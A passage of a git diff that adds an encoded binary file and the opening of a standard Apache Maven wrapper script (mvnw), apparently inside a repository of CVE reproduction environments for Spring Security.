zH0_$NU^IA*vggPKcV#^ZnMv+Y14O`3_6&I=gvNS4SzCcf&xe8RyXn8fZ_2*%8?g?*
z6Z<d6cBuJ3)Zss5@GH4=$vB??=bO2`x^t-EGOmkv(nAK<kvtTnx|%~IVKMaz862r)
zAd(y-on~hW5RG9-fQXQoGYgsV0$3~C7Gs-wG6{PDJ$QU9WOgUPk^oU^#LuK<fQ|n_
zG5%11j)lI|>w|}6J6&u$=>oc&F04YExJ?PQ0YrF;-po++AD{R}`r&{YK*+$y8=fBx
ze|ck@H(vicS@v-{9`8M>U`RYh21M#1^2<M--IfIE_V}iZ3xF5$`K);$>8W%MFs3b&
zo{*WD#d}v7c_es!7}Eln^6=!11`Y#=6k0S4R*g|4Ad|bx4*=5#qV`SpX2ZMAGKjqL
zMh=<Tt3L=~(Nm14mxFP9zBO`W0EZ7{>>NB1ivmQghlr>6uWJG{kimD^ewc^o%^YUL
z*dE}-w!i&!eZv~gTly1YKTTkXiFasGU}#lxbsJJ+d*ld-M<@dk->uMOKxDnsG|Wam
z5$n}saFl_{Y@X|&@(@)(#FJ$4`bZ9u^A33r5p{MJJfQ+5CAoFV6c$Nx_3)#Oj`iN@
zTM2Dc4O)KkZ$W4k5UGbqbBJW0<cV_n!Q-8D4M<~rPxDvW<*duSXU@&{h%nV$JU$v0
z&_w82Y5*7a00|m(^@_00GiiI&$1_3*plnk;R_3W<UvDKiVp_c;0FeVA%*_)n+fTr*
z;WPy!);$i0S|~CgYC*|DW*Z5J@L(|wsLk#vEZ#~FwjPK$PWGE=j+becZ{$RF2?Nr|
z(eS0^Pp8ITU=`?0#x(0t$AGBv5MA0>k~mI-*c+#)@)lL*fvBw4dWWpc0O)__kXZqG
z4gHctP5A&sIai1d1svzu)Sg)qI9?;`-3aIy>=?XIu3<#>b1!?wzA2E+@-r9CE%Ar}
z1M(muP=2_4_g^%B3z&H8J&h!=O+wXpj?_b>Aua_Ymq)ZHULxyK&-z0S(TtE;$3rv$
zL~WRk`%dp6pLWgmmE%2~j*a`M^vX;7^s`&qNv1WpVE2Fy8F<8CgS!GxECYzD`c)6J
z92x_LtUJEt4q+@~rPqG^gAoMvK&S;GnHSH{mUP44UffOx_@?Inqzi)ZmIBecT_7Sq
zi0$AZk|z&wXX^#fo`k2Kc`985O1^U7Ieg?zT=N1?+SAOuKo%MUaJ)CjcbPY1J0wi|
zx7%Y1PkBCrkS%M0h_D&G$ViwbMog%Six+pOB)cW!j{|(XoG2d;(noXNze0C-LRqO1
z6R(kPz!ZppB|wO-^W+dQ&vEm|WIL=wh>i=~E<{2r|C;Kv9-a^V&YV>JO*};JNR~fg
zB&$!i{P%&D*3;9#O%I3w9RKEe4@Lf^uks2E4@A_-KvW<_J!@O(h725imj2+FOdsfz
z1i3R7*1{7;{t!T9=dQg@u>XDQ?Io|vs60d#GF$LF?Wc34>yoGqm;guIWX|Wj5T1|?
zwD=ypSe(xn)AtiD^RMynULu2^>Ro5q<oe4%q&?`0m#79J$}|z%fJi+?#Y#Srf)V2m
zb%97+>Iy_B^$-aV9nc`_6FVLuZqAxRL}N!z5sjsS6=49)A?kUC`o{l-@9P24{d$Nb
zhaumTC5Pv8@`H4Ly@v?T5s)I?xdDu{9v+RK|BHeNIY!jSOTs))t_!>;2^OY8Y|^M7
zX)c6>>~b$N&Ykr%!wb}!<|px)Jw)PVDgd-A4}ydp_}mvb5Wum|0f<VEu_*|e0wQ16
zfQVxt|4ENu{|nk^YmYez5vK2+^Mw8w;m2EY4w(iTfkZnul3OKUxaa~ZW%TqbK%|h$
zwB!)oBZtUx&kSxXDSHZz^nd=^07ND4$a{t=kI`WPBD;25AbL9;8=fHZ5DlTURBquj
z_Lp_3_f~GafjpMsJtXvHqq1||0z`NUsmF2&ogEM%>EGAzvJm!Wng{`Hf&hy2yjF-A
z0Z|5*VcG$aj&z@Ziu<3yQSmgjIZZ7P*&vdfBmR5j=<&Pp$^V99d*>JLDI28Y#^VL-
z7!dK>@L<8YF%OYlQyOwpD59SIxAE-Cc@{6}oN<UqN>=bO7!n|o-dhEV43^}==m3#~
z$vQAp0Z~q}28cAVdV9$6;pK)TPS-%Ro9gTe5aB&CAoBJX`RNF^w7OuQkteOaL%b#A
z9?@;~>2%@Tl@r2A<vZ^1M&nfW^2V9ekUf=tV0v#U_?U;M0-~H7)EeJy9wMJN<m;3W
zngY?Q8Hhf}bq$JsJxkv=*F<CNrwQmJiEg2}LNwl=%xTnar^azh>c4RA^yr+l_TQd<
zDmAclO=tU>fc>$&gl}j0?R0Lj4|&^hUIt*%O&`c1#P(9U@N9rT$zOW+Em=nQc7-eb
zBYy}i3=qU;ABeoMo&nKuCQy_<YY&kEiX>g9Pm+iA`1WP`+X?6}z<{1#21JCl_+<WP
zxf?iO#K_6y7~%EdkFt|)?!XklAmbj*#z4fU07=>&o+NUIK1#otd5~Hoj|muJ`vB3W
z2Xm<_A+uFLlx+k=KO$tNFl1)SOW2H01)nJ((y^tA$EcS>B=1Yga7;JYw}1Yg^AP26
za*k-UQp24+M1;xi9w-F1=VHp}KJ3G0Js@hI@K<?=?iYx(mzgFts|Vv?xQVvLwZjb+
zPfPE?t7mwWd@nPM^TmxE08%eo0V11kx6?DOE6E`eASxlV<AF%GKLtcRDB?W5)(M%h
zOmn0Zh?oXazIjT+dORG6C+9B=h>BN;dphTVY4fPju+bRW@c~TM@ByT3YsSz9sU2V_
zgdPw92%~UWzBa}{R2$zbp;&29i+8Ba4>C^?Mt#<k23wY^*V95~<PdR<D-6w-XR{}a
z{WTz>oH4nmhet`yvz%8vNePGqczCT0->DuVJ4a0K%D!r{HRpiy#J<@v15^e?3~iyk
z%M?(|1b*h$qs)PjD`WlQAu<qBz-c{0wp|0FY8f7!!vZYcwC$#o$J5f5<Nd;GL}v<y
z9q4(LT6^jla*59h7ihlnEe)d{@^JT#0nyF?Ky}D0=N3s0k%q|FXb*_gL$sX@Kq?-i
z7Km7ecWC!O#{~k4=oLodGza`{2BN(~O|AoA&Zb707&zs`mi5oDAqUkSG{)FQY?Jlu
z1hzoL1q6g~^Cipv6M)1)Q42&>2rL`lMNW`<fm{g8<r1|av|bL8K+y~c*<LaL6@%9K
zi-Maje+qz!0T}-^)qh{=(?wsqK5EEp+C%g!25wCAgyue_heA4j8e~FZGHP)4u23IX
z0eT3Tk+7{j*m6R50wPJWp6Nx1n^o5%p|}8%zMRzoPzQ22Hj<>LmiMd$B7-6z2k!_#
zLQW1jLU`5W_@p<NdWf`(JAXa}ByxJ#9(h6l5z{~88cWMq|NH09$vXBuZO9DJB6kSW
zaM@j*o)Hfx=}~X|c#61gfgyUkvHk6|j9zB!GuvAgGHc5*z5Y%BL}E1%wIQ=1q543<
zhj))vIYa`L#XEG88<3fJfseF%H#cSL#!dsNjih>wc)HgxfR05}Ly+YQ>3sWCUK*}9
zhK9~Jd@TsIKx6~_*}8QOkLDOyBWz(B*5iI8IW1`&ycaaqJfLBCv3X)Y6wi%%nIyM?
z-dgwappO|`fEeIM0Z6?;gNH~U^Put$u}$)b$frE|w_GMUOZNn@Y#bs>o<2TgcK<-c
z?`gfvtd4c-XPWcHF)+>VF4scZU#2D3CpU7MEIrF%MD3Y|M+Zpa9?d!Cn!#JZHt-q|
zGGqI8PWi0}H?eK=LKPr-A_I}Wbk}=-#z0iVk@a5Gq-t{K#@F6)K;-LMVzBSw<a?PB
zE;eW)`CbMAy{Gw|;_0}j|4WWtub<iS&(p)d<q(O75nxRJIqH!_Y@sF~Ot0;^+{<mu
z9+m-DV<6%|IFCQndWNig(R90SJVR4fd5Fl3mELX%h{y;2d@eb5{D!xF!4MUi=fg1(
z{^NHrAj0cI&J*pq4zs{@uIEp^q-y*o;vq`E0q28r$%6^o<o`>30ivN>eFH=WI=<{{
zfAF>CxBl!;(oN*=2YdY|YOnq12etiJKfm>-|3yan)R39N((b{IfROIYzQB)lgYP|M
zL3I2v=t0I!3^<~U`qHJ|t<Q29u{r?_J<Hl{wFWTJ&GC~2FxUV=(hXnDht9nHyRUt1
z`JdDA-Au<h*bmiiB=GUZvKz_%DAi{iA`e3V6Jrm_1-aloH~n!E{!fAtAV<Pwb3$NT
zklKT+%^?~tSb?IQ<p*;bapKkc;(cO!G-|$KvmRzLGIja{h$ts?M(&6K5u;O6hxyYN
zbX*+;q8))7ds}@KKI^~@=kGr~`K{%(AHH^Cqdp^Cmlv}t3;`k}Hj^Xt(_4BCwa3T!
zL^42QvKKeB=OQ-^>X7hEf;BMoX6~L(8K3_|4$;tyOuN<t2W*p14R;aN%FAWc>@p~$
zeLo%*OZYZ;#bX3``LJ30vRB~7racsK{{HAspG?=)8|nHg2J}#7M%fK1dp%vRPs;Tt
z5R@T@^9BG}k~inc#vziNszb&h($TABwCY10!-gk+8f=b7ZqT`*v}@PAM|+2d(iqV=
zSz<d+{FYd2v29~e!vFvtR7pfZRD70EM|#c>29O3R=Vu)0;CZE?YJq4k-=CgLjr1F0
zuQ_{t!l*CzryO=rZ_-R|!aQ_|*ZFg8&;b%3qNfY~f-sIWym}L-zAXEldVHu)VyK>v
zC!~&UPaA8^A7a~wQdbg-?`cmk$srQ2w<crT_a0~b7C==EG{+@XAEfj52g@h_>z@e}
znZ5Coe-!g&-oBOUGs3k2lZ|m?Km>@$z8oo-a2z($w+-tco~(4vEfgl8!}&P^GV8Ic
z&eKEhXq;3n*Upgw2Hzo`yHtl^0+`l(9DQe<Spgus-mKS_ha$bM{v=%|HjdS6KhZI)
zT6-<Qp)Pw}>T_KUUL+diLqcY`@%6vg*Lh&j&ID5b5RXvZ4hjtA2L*u1{zn-1e3sFc
z@sPWdpu$3M7~AIf{q{IsdX)Y2mbL}bp{MPAWmj8W)NK+dE}_LK5DKMGiWEtK5;RB!
zD^{dX+$j%M61)^hTijg=MT%P}uEn*uyAz!71ig7W?)?Y%(>vbt<?IjpoIUnjYn*Y$
zo@>n+l%@ET=}|uLfxUTCJf5#l-RJX5*cY_BUCNzB<lf44+OA0FfRzrm(jK;xza836
z*QcVpRS%C_jc?T+{b0c>EG|dkd>A=>%@9J;Oh65DAoc}AR*;u<pLFSjwRj%*b$@Ig
z;t;(Xd+$C_0#jcfF0!-w@YuBK`S#K@X(zqpYUVn|P2)r3dAu<MM;cBLLiA8Uie}B@
zQ^E(SBgz8xl3_>0yDrwGcpM>F#(?yz*xo`(bi&24RNcg46w=J$(a3{+5hD8w{`4dw
zRB*|uQ<Io%2zxbbLr2MHsoN_|I@;;{OdNjuy4yi6p<}N82}V#xfQ=2Z$+aw8`9bD-
z?D%pZs1qx#AG_Rt1eg{^Q#vfyW~RVQMWvK)m#J@^am@<|Ev357SDz<k(dttJ1e#cU
z)fU{->*m@gU1q0HuK+;9mc%eP-ld#RUP_Ko6y6yAJ_k9x03iHs`b9u;o*^W~G;E?I
zIakkYul-&=qd@*x4&oKGS@+IY1|1%KDCyd=#4ct`$ibOF{*HH}S7R`smu{0at(+#W
zFWc?q{RKXNWSJsK3aa13<<G9uWg2gcOB)o{$jeO}=XuSWGmuIwHkoSv+dR$ToUAMo
z3ZXSFR-EmNA~Uj2iz#D}3{`Tksl}AJ!sAn*leOH<*p@umsAo=YYY3_CYf`}|2W5X0
zu>fmc=z9E~{aI4y<!awAlW8e{`Io^&Zmk#*MUvM;#G9Xpt}(eIs~b<8A0CRcvt4k}
zJP(=Tir7j=e(lzYPPc64GiTOMTjBU~m1$l-&%RyX@1KIbUo5;6qnsm@svILNJfz1|
zoZQ*7P}6yOXh*xl2C}(>$~htLqe8rOs-GuNPj(&ksDBjk4S3&jo^w7SjkD6{sL2!Z
zXHG=yg!aszqy-VV+k5_+1*x!caA+>^VsMUwbi&Jy>8smekGC{+&%0i>H#fvwTAP+L
zq{~jyohyo#2KQ>*y~ZkuDP53U0m&h@#~@qt4XX`cn|<m@i15|F`{#^~T?6cmSXs={
zV(w+6935CG0@?tNUWvxuBPPi-GZynT6mLPdp8a#tfbV30<76}=plqe!^SgY+sZ#>G
z!o@|v`&0+QeWsP|&&}L|^7@`<SoP1^i*`tIi0mS)aPT!UUce7a*M(=frMH<^YM{91
z1y2`f60^Kui@-exK?K7z)v)lUJDY8z!~svXfKX+&r7beWGn>oT@tY5~{!u}c8fAIQ
zK<LMKNB(VC@U@4P$8(ll3=c&T15ZdDGM(dS<=3&P<hj75hWy)_J5Dof)@B9$3no@z
zQO4PO)S7iXhr0Y*VnGbS!*uus2GIg3wo|XA;PN{!Pg}x*de-hu^>8=#cPQkXNvmxh
zO^QhIk<lGfRi>(_@=zR5w<s7#HXQ8jqo3T$Hl-+;c*P#|QeY+;3zrL1`#2G>3Hv7@
zXwhbsc2$L6d?BN2KZ=B{Xl5M&Uk_@Ar_!51Ijpgo3##bSz<VIsW3|e9QZ7$|#s-v5
z7O7{ef_60O)zA}6U5O?8ko7D7u8>xPEz_ja1<>2WH<W!zlkSHXV5b<&AYH$kabLHL
znO|apz$L8juzgBBw8lbXO~LvtBF2?fI>y!P5|Rt+dGaFpFwqmG;@$Z?7A6NZ6EjvQ
z=e)&#agM7bC;w3cG*qdwTsiXj9AJ&QWJmA{S}V1Q;RXXSLhDG8yr?o3DCPX&1r@1g
zB0}iTn#xmBzXaq%eKdMmF(c$6cFJHEpWG>bmR1VD^?5y`-h;pCNj(lvr-X@oEhQ8D
z!XJgX43s~(`eD93<uR_1v&?#y1Gv}F=zHMmA9VfRI}If68!6dV?x3fXHt62L_2g_l
zDR?or7`C_o;F5AC3QY}JuA|{=dDASUTS^C{xMV$%Y(I9p*~&GR%`4)Z)JKCRE-t-z
zKu{v}b-5$#zrxhJ{2eviyJQ_(9z<Z_=iTvMnT|b$xo-N^;SR6*&~Gk_sBa}5$a(SR
zfw2`@vPx)a4U+EzhpUu5Dl?wdIClJh${FBci*3AWZ<;0QXX7hNuo6&EzbU4eGQ$@1
zQNKiqsj-bD#BmuGZ9YO%hiM*kiC<m<cnj6*3BgX|0~z+_?gh}0bUcl&QTQeBPY7Vd
z7nFKUp|GGNTO|a3yeul?$yuhggpzDf=s*5eRM;4BH`CS2KYi$roBbW5vD2X9*9^aK
zw6ENM|EXBCh>5A|UU&6MvL_876=fQ>_!X6!)hWf}QvreNythsq%+R6Iv^He_adNc$
z-CLM3dz#qw&QEIWi!!KI%gV{5m#y#6&Ky1DL5PaWmt$epFy^gHik7VK_?Xd?LMHUX
zU6hW5^zWEakE8^bBt4R3QKf_hJ_J+@T(Fr>^xcf?-o_E{Y|j4WnkcDM!SwlQKScFB
zq|TrI#pG%o7K<npG4^%wl2On*f~+6YJ8?TOM%4vCJ_tiNHAMNAt2p#jmh!0Kl6GRl
zKNd2XQ7@+)NHTybOz{RM<}~`}UOv09Qtn|O3ngmL{f@BUvq$`u3`Pdg+mGwnA%8wk
z8pSVnrnE*rYZ$hI0v2L*<|hZZD1P)k(XUNJDsb82jBhOqH+WfELp{Z39Cxrn1Ok1<
zhb?QxLGjAAfT_oYkld%?lWk_7pN`d=w~Q4m^5ZR4O$qQahEm|O;yd3#qx@jRp>3Zo
zP!ssmj1G`Q3BhZ1KEW%5ImH9FB1OMZz-!qKq}zjW1Oubx44qB`WB0hIM~`1nm%j^O
z!*k(j`nC8X;$&&?`260iW%W2j6zXmSev^GN`oXH<ACBiD^xg})?X6F>x=_#f5-y65
z9(W>?*tbs2y_9D`a4&>~wZk7R3r+*;ds|Uu1_2NHV4%;B?U7kP1-rG2{7Gv*KP1l|
z7ay<d_<ladf`1;MJEY&y4p9R-NQEI679|9HE_VYSQY$TZX|;X}OjiH5|748ip#p)3
zYY=mq0QRUYY0(#&!hlL%CjE(T6y*VuwrBzGmQ|L%Z_i6U+w0wE?Q$T5Pye})ZqP9d
zj_K{x&<Okrj3oZvFoy{4y;&*$qnYkCOK_JfsrK4fZ&R<H>=~J)XLPUc<ZgVKo@4T@
z$VE7jOD;vJ2JFD!W+EUR7(6y}%zGka@or~el?(QpB6wrx41|)7EL*+?j?mIl%2x5b
zJ6!)=EP_|AB7`4z6sV^qhJQ6o4>bhX6+3F|bpAlE0GR_L+9Evu@aPhZ<S<2wTJqo5
zapyygcqg-w=nR*Uq1L>*T1MN{OZN)RK9BAX(Rv3@dfc~?jXu%r_a7&SssVadoR^AG
zE0DpF{Ad2%fvV)vn5&<4Z@r4u10$I){edvw8Nu@tIxtX<>FX)0&Bx#N+36{uM<Dsi
zs~1UJ%6wp-_<;PEsUDfy?HZIY`rnKxCnOTPaeO4T!tc8ciGv^W*zJDYD~G-33F)T|
z_DG1!+iC$u2Sm0;0yG1%fzhewDpK&4=o2>msnFJY2=hko+%)bkViqYl`LQ2aBLV`7
zUV{jOO%0h)9j=62UzS<lT*ls;0gQl;kIT#=*D|{^ZQ~H&ooQNUCa|rIL*Z0<8+cim
zyo=JA%NTNpBarooL^VL2D1W9`a_8Mlff7phATp5b+^L+GPc||j|Cn&TM<{1@^)lFJ
zfs;#5A!IS#qj++N9v&=72VOoqg5>o%)V4(cHS95HcdylBhmRkB<7-$m9hw(JhBXBf
zPHFqPwq%a}O~sp1qWb++<h_|f{n>Y=OS6XNilqr?z+<~Q(AVt5atr=h1f7+Ca6?v?
zJy=2{#aF^lhh&-p>Q$@3@8iyx<IzWtO%rSxqn%%lM<Ta+EblG3HY9CY{hVu1xZo9h
zg8?ZJ0op7jEH(zbP)J?0R#V}1_-)2S+sqUh1%}O&XXV*)%^>atr*m)okOK8rLT~N>
z8*kNr8vm`p8Z@wvI!4}#7;mtXb*5*`P<-kxeVPJ#fVkC1w-(~v(vhx~LzJ>Pg8t)&
ziD7i2{?YzXAazQ(<bno9LO3E4G!9TCm%Mo$7|BEx#ReX6A`pYSCr(KA688ecWqa!`
z*u>X~d~g^-*;;o8JflFS*fQ*t%$5Sw?BRF=cti3sQ>5#8Y=DhsJ9UOasn`*htu#$1
z9~4cE0y@2VqVampbl*QDaL^JuAB#8`S&~RLoN_SCvME6*(nCc~I4bEsOK~AkG={N4
z2KD<dFr1rAcZHZU^Mg5#m@OF%@B-{o#UD}5`cKKTfa;R}E-ziv{3<_><kfy3y(wbL
z3bAW5BcNpx1wT#!$|I)B1R^zuSSYH8MWKNSMuG&1`zgSPPm#cAX0{(Xvf5sL$PJi$
zGVMEm)HT3+<~oD$!IEtd5T0FvJwbnirDsyeySl{n?`9iwBsmQLHOS>RNRNd&gzj*a
z-a_XOfe(P}!QzRA`JooS^@+Y8bIpAkiVb6-p7f-|NfW_Fg}7whYz{?&IRbuMqMyd*
z<19tT9ua=0cXr8FZF7uPj%|01nP}_MqyDO9)-K_?8R7a~Fk+mc+v5qIurCivUm@K|
zfW3sYO(_{#K|@=7GbM!V);dHzR8-zNJ_J{5xV;zrG#|&%j?E;AG2$dvtnN~V!GDWb
z$ZEg0J(PUN*hc%+rQ2cI6?I`HyVhr6EN_e(U9wz2-!8CNgws^FYOO8j3lp>v!q=!U
zUmo&EnyKv86A)socR^7n6r=!tmBG&JjzlHNk|<<a>a%TG*RLLT!KOrtR`m2D5yPmp
zxhrR9e02-TJ1KZTRNIP;v*-EUcJmx#&XfC;FUDA%x7V4X^ek!>eXs2dbteKI1!hsZ
zsyL9uXr`<7Qhc5hW``ES<miKYjqyGsdU>DAD;ShBO%3I^3=!=5L|@Gv4m%Scb)y9r
zfq<zzyvo4PZuM+`i-y#zJ5mOWntYk&cm=(aa>~8~va3k^q4ouC<>)a$?53%lci2Wy
zq~|<JnE!)<m98HkkLuskBF~U+rk}1sy@r@^5kfHU7y!O{_%<M?yqb-J;5#t1!nzw!
z@VQ?!g9K8sW*?MoMx@l$syUmly>U0ww#A##60e(x+CiL2(o$<xJCRE$=u@MLMw}*?
zm_1rPJ8o&*(W!6+(ccZXtm{>66CJ}sCXgmG>k(}p2gT3@Q*^I`5qGsddXIngJ~JZ}
zTD0n0IPr>0LRp#3-#|++ocMv?JkGwnk;<@TyIrk(+&wo7F9AIbmL&K}fwyDxPj6?&
z->R;)wIW`Y#4L9~I&<lw_kSHGCJ*2bqIAW;Ob(}w^88nxkP2LJl{9q4KbV--+m7)K
z-ZqpuFjAi!uIvM0eyIQaSHbaD|BO_7F7R3dJXs+}&~{yn>6Cl+h5I2HBKx(xwJnlQ
z_1@!30s#d4Wz<5oRjds{p_*4GnKE(>V$;n#BiPu<_0-E)wrlCPOSoMoFIx^-e2x>P
zOf+ZgWb3Ir>ohr>$3dx702yCfL7@^YKHm~O^w18bNM}P)E9n_mRMhhF4kMG&0t2H4
z9|yicaiYBZ+Q`qOQDWR)oCxw}ShMng=LDqVEmO9%YpEV#0tImr<WXoP0>VF6xwup_
z3TaEh?|3v!c85>LPcCHl_+(Oi7*0=qD0k_sNB#^X-twlhsQU32WO}<f6{_lE>iS*%
zrbxNro9LWfdSvc#kO3pJ+=yB8lm-={?WgMXyS#@&P;Ip}so_b6xAN7%C{c<K^Ak$t
zIIc97?7ESZU=GTpaUlz1&d^ThJ)j-`q^S=zjOhM^tQVMBiWQIPd(<`&s<-8fuAXvx
zx-j)4ez1?e#;Kx%n=xi?`anXm^iI5g+Hy^gtVOM*f^Ss4uAN}iJ9QHZ6w;D&DJvu<
zrDi=F$trXg(3@c;`(~Y~*By8NIOsl@G6N9h`Gt(4JiHBvd2F0>m&o3veq;uqFjnoH
zw8k0MYTfHwZ`13NUj+KzPZ&4~$GZ0unDgzTg~S+TbA)mr1g8|H6%<Nhv_B*Zq@i3!
zTHHc8kz9S$qM^AQVs$$Q0tmrrs7$WNu2XZGYMWIcFRf{fWzstR57wbacFqZw!@SOG
zYA#TJGW96+BJLNj_=gVoxNJRD2fY02mR9>^^C(LxcL`L?$dv#5Hfc&Z&p+A$*OeLS
zU1FI1k2guaT7?qF!W82(Q(@9<qO?kH8k0UWke^nCAq`77%IQDRe(rz5#qEA_*|q1+
z!U>5!jBO1I%07MGNUYc>TGxc|A{6%z{o<qhAu>)=y?%jVsg}>m-@;vAw*jstp~Un#
zHLnZV`a&h*`T-$#WK5$Blhxxgj-2>BLzU!;Xqi|vFI#4`j0I7DEZ%K^)PpgClsbwy
zgN@|OKc6hFRv7a%_&o2F`$V=%Y_fr*(UgJl=YZJ#|04e_=ywi{s|J^cMg)8wM1$`X
z3(2AZ>%;VP&$;Xawlo54Z1AojMQpQUb@Tg&=bmST?@mv|<<8x_Aqdv5iCAt!OFARb
z7c*L>b%LV?vMec|`kb4TtTx}M9{+sOyyH6P$jVmizh#40EOHl>#o9qCcFT$37-7G8
z-Px=X5o-DDbgK%f^D+mRLRFU23`8Yht0c6*e3-K=W@lSvc)G)|!#cgIU7o7cKU5y&
z`GqJV%E!ul)(Z55Dfqs4bxY+;f1vi=yl(_t1W^P@^r&uFNkI1>D=EA`TsV^?c4}jQ
zyl-HaWl+GXzN+DL=lA-LU50pun0IyM<qe(~GqiSm{Ffhf4AG8r!^qctSA}Py9yb@b
zbwrAq2X;KHb@1Kn+w^7+Cj@q8dVN}NP;kiTc}6a7?rpjn*5&bYAF*k^Sd&Oxg4XqD
zK{&tl%@4gn0h5<!Welb1hE0j+ymjlBxH#A8LCNPeSH5Ud#LvrXzRiTicH`-{O_Atx
z`I(zVBUO*}P~ToRXo|X0<3zrB#*~R^!jNFI*PXtT!6q*WAE)$pH)ocWr)jp$WzF&K
zgMzoh(<in!IPFF0j8~Ufqo22F11CMu<4xSUYn&qm_G;r!fpuSc^JmBWAC_pN+|i0n
zfn3ZxDZb9C@$*@~g`G!U0<#|l%vtPgn=|VBebZv<{1EGA#_3N~WfJyqeGHb3n}UTt
zo6)T5(;r{=PKRhWdt3W>R}{apTbxd<cr_@w-rkglu{59QUB6^m{Z)40BGonZvDD~p
zwr_R6<7R1zL++xVD-M*AAh`YLq%=qUNwJ{E*~+n(p5TvN4=w3i?&8Zv`xME=<nhY&
z?L_0(yBTVu)+NTq>1wkFc<q;_I$n>9xIWvPUJIYzAtP7p&c^Yc`-g;t%{NKYI8ncw
z3p!j;uW@6;oXVNt*LN>Q$EIJOXY|!N%s`!-1O(@Xw_g=VdmLHaIP{f>_&l6lU*Ax@
zF4{GYIvz+VMZK%@Ev^_~DRj(F!1RWV<L8xo7$%e!R<AqUKG@yZ)<O4pNQATKjXs^|
zszj__*vy{WGyH)HR$xw98E&8hiw()X)UdpiXSjD)66YQ|*l&x235Gr;#3cdP^L>_P
z_T8BVH51RXXd^>2T%FdaBSWQ&SczdJGHC*@yYg+js@SBrys|(Q=Ed)mi#_$lgo;e7
zRqnaj@u{1v-pl4!b$o=etVl3kk3r06#p^eIvo#LePWZF=O>Y#&QC+@Z^U4vn^D?c_
zfv@;u98`bSvcRj@xW;-0TBvUr_M%>Jb`-lv0d2`K3g4c4Uv-{WYW2!-pXo{UVxHC|
zsxcLFs<TdD`bG41N|=@`NIpx$W`Iui|Bf*KlSkFeD5yF=yVqX%y_tgbjpKwqYxa+p
z5i%(+b#11kccnAgI-z(tcxcIrtMQ~Hm8dUn@A!yqPy6gXZ5ktr%|yDsVucJA>iGHZ
zECYL1a(G_DtR)#LUfTx%`HLkF?FE?)p3O7>!WAjOxU!VI!pHYF8=jY>?%b)8OrB9P
zSdG0Mq~Cj7TUUD{nBmjVzqz^>H=bhK_HCRYyxIIjJISwMb>_IQ{OIP{a!>D7t<6r@
zGwn4$lj&0H!t4E#y5nCXFU~6^HWnnP{tMm~&GrZ=N-UCcjY5pLyDV6<wG|-8(mkG4
zb_6{}qWy67Uc;K&1mDJ3Tjkzu)Z|@iuqznmT~iGzd{_)QncVZMp<2g%rV`S;7Qm)4
zJ$AfR9$wJ~su`EoQ$Lc}kJ--~w?~U1!v0%|=hXSkCZKz#h>&y=Om+5E&*o(88l;K4
z$(mQEy!e8zz;bJ=IQF?<ZIryXi<SLHoEYbcbXR)|O-&iODHYF~U;J5lfPd+rbnz3G
zl7hhxjQ>G4%sHk<j$#(<wL@u!)yQ2Mpr1Bo7^ih!by%)nD!m^*oA~AK<vc9^txzO2
zVgZ?5p_BEKE_39%Sh9Khn6L{rljp0?!glHrZ4ddI#DYId8NuW3dVUc<>%(X$iVjgI
z$ugG};k?IlWBXp#^Hldet22l1#5Sym(~jd<)xPh4aPLQRM_h7UZb!H(Hoe8iKS(}8
z!vqHDl@!>Xs<LCzQGnGp=M(Tf5;$2G-C|Ym8LQKhwOFUcO2PGYzMtD<NYO43+qn4^
z4t{tn+4B#3O~y^l{#EebRPrIcumfuT{McKAVx!;|ogrHEv->%c{)SkWEz?2RO|;sH
z8WmhY$01T!v(f;ej_cCq-?`CE^O4#9C*!>gOsIO8;V()FS*7>Enji9GHub9WvK^<+
zYfMvgSR`^=*?X^!)Z<jsvj?$~vTMt-&n5%!)D%aler7KOkCUl~n&e^9pw*b3Rq174
z-7~UZE_-}_=>L*Dh%H);1U^b>cnx3N*ynogZdX+z>f*RSN@<D(pK)YnFF^Yh#vC)f
znAr`V-we7XX&CwRZ`Y@v)yg2tR^3Mtyh{P&8scY-WF)JYap==J&+0Hzox_>S{j3!N
z*7G%AkDZb$jKY5?AW@PW;Gia#9e=fQI=0MJZQw|tQ^&R@#`-VV)S5teb3||C$k{1s
z(m|(b>?tx)_LS#b<ZnPj@&Vr$m5WuN3Gf{?+!wL9j%x@q_LAu@EDG9yk%K~Rc})}4
zQ{=2slAk;142@I#e~%UczW?2-ynX5aj{bjPa7(-}U7;4{KJ^-azg{S+!As=dfBHZA
C{xLWJ

literal 0
HcmV?d00001

diff --git a/cve/java-spring-security/2022/CVE-2022-22978/mvnw b/cve/java-spring-security/2022/CVE-2022-22978/mvnw
new file mode 100644
index 00000000..8a8fb228
--- /dev/null
+++ b/cve/java-spring-security/2022/CVE-2022-22978/mvnw
@@ -0,0 +1,316 @@
+#!/bin/sh
+# ----------------------------------------------------------------------------
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#    https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+# ----------------------------------------------------------------------------
+
+# ----------------------------------------------------------------------------
+# Maven Start Up Batch script
+#
+# Required ENV vars:
+# ------------------
+#   JAVA_HOME - location of a JDK home dir
+#
+# Optional ENV vars
+# -----------------
+#   M2_HOME - location of maven2's installed home dir
+#   MAVEN_OPTS - parameters passed to the Java VM when running Maven
+#     e.g. to debug Maven itself, use
+#       set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
+#   MAVEN_SKIP_RC - flag to disable loading of mavenrc files
+# ----------------------------------------------------------------------------
+
+if [ -z "$MAVEN_SKIP_RC" ] ; then
+
+  if [ -f /usr/local/etc/mavenrc ] ; then
+    . /usr/local/etc/mavenrc
+  fi
+
+  if [ -f /etc/mavenrc ] ; then
+    . /etc/mavenrc
+  fi
+
+  if [ -f "$HOME/.mavenrc" ] ; then
+    . "$HOME/.mavenrc"
+  fi
+
+fi
+
+# OS specific support.  $var _must_ be set to either true or false.
+cygwin=false;
+darwin=false;
+mingw=false
+case "`uname`" in
+  CYGWIN*) cygwin=true ;;
+  MINGW*) mingw=true;;
+  Darwin*) darwin=true
+    # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home
+    # See https://developer.apple.com/library/mac/qa/qa1170/_index.html
+    if [ -z "$JAVA_HOME" ]; then
+      if [ -x "/usr/libexec/java_home" ]; then
+        export JAVA_HOME="`/usr/libexec/java_home`"
+      else
+        export JAVA_HOME="/Library/Java/Home"
